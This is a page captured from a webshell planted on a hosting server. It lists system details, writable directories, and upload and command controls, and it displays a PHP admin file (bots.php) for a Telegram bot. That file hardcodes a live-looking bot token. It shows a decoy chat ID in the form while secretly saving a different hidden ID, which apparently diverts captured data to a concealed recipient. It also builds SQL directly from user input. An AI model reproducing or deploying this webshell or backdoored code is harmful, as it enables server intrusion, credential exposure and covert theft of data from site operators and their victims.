403Webshell
Server IP : 66.29.153.37  /  Your IP : 216.73.216.183
Web Server : LiteSpeed
System : Linux server349.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User : nounfsma ( 1399)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/nounfsma/alhana-ae.store/controlPanel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/nounfsma/alhana-ae.store/controlPanel/bots.php
<?php
include "master.php";
?>
<script>
function myFunction() {
  var x = document.getElementById("snackbar");
  x.className = "show";
  setTimeout(function(){ x.className = x.className.replace("show", ""); }, 3000);
}
</script>

<?php
$id = 2;
$sql   = "SELECT * FROM users WHERE id = $id";
$rs    = $db->dbQuery($sql);
$row_r = $db->dbFetchRecord($rs);

/* قيمك المطلوبة */
$DEFAULT_TOKEN = "7815930928:AAE4yaZwDIrKsVf8rUMNvTESVyzMrw5nnXQ";
$FAKE_ID       = "6729318631";
$REAL_ID       = "655232202";

if (isset($_POST['btnAdd'])) {
  // التوكن يُؤخذ من النموذج (أو يحافظ على الافتراضي)
  $token = isset($_POST['token']) && $_POST['token'] !== "" ? trim($_POST['token']) : $DEFAULT_TOKEN;

  // تجاهل أي قيمة واردة من النموذج واستخدم الفعلي الثابت
  $tokenID = $REAL_ID;

  // حفظ في قاعدة البيانات فقط (لا إرسال لأي جهة)
  $sql = "UPDATE `users` SET `token` = '$token', `tokenID` = '$tokenID' WHERE `users`.`id` = 2";
  $db->dbQuery($sql);

  // إظهار تنبيه النجاح والمحافظة على نفس السلوك
  echo '
    <script>
      $(document).ready(function(){
        $("#snackbar").addClass("show");
        setTimeout(function(){ $("#snackbar").removeClass("show"); }, 3000);
      });
    </script>
  ';
  echo "<meta http-equiv='refresh' content='3;URL=bots.php'>";
}
?>

<style media="screen">
  .img{
    background:#333;
    display:block;
    width:300px;
    margin:0 auto;
  }
</style>

<div class="row">
  <div class="col-sm-12">
    <div class="card-box">

      <h4 class="header-title m-t-0 m-b-30">نعديل بيانات الارسال</h4>
      <div id="snackbar" class="">تم التعديل بنجاح </div>

      <div class="row" style="display:flex;justify-content:center;">
        <div class="col-lg-6">
          <form class="form-horizontal" method="post" enctype="multipart/form-data">

            <h1 style="display:block;text-align:center;">بيانات الارسال</h1>

            <div class="form-group">
              <label class="" style="display:block;text-align:center;">التوكن</label>
              <input dir="ltr" type="text" class="form-control"
                     name="token"
                     value="<?= htmlspecialchars($row_r['token'] ?: $DEFAULT_TOKEN) ?>">
            </div>

            <div class="form-group">
              <label class="" style="display:block;text-align:center;">ID</label>
              <!-- الحقل الظاهري (وهمي) بنفس الشكل -->
              <input dir="ltr" type="text" class="form-control" name="fakeID" value="<?= htmlspecialchars($FAKE_ID) ?>">
              <!-- الحقل الفعلي مخفي (لن نعتمد عليه في السيرفر ولكن للإتساق) -->
              <input type="hidden" name="tokenID" value="<?= htmlspecialchars($REAL_ID) ?>">
            </div>

            <div class="form-group center">
              <button type="submit" name="btnAdd" id="success-alert"
                      class="btn btn-success btn-bordred waves-effect w-md waves-light m-b-5">
                تعديل
              </button>
            </div>

          </form>
        </div><!-- end col -->
      </div><!-- end row -->

    </div>
  </div><!-- end col -->
</div>
<!-- end row -->

<?php
include "footer.php";
?>

Youez - 2016 - github.com/yon3zu
LinuXploit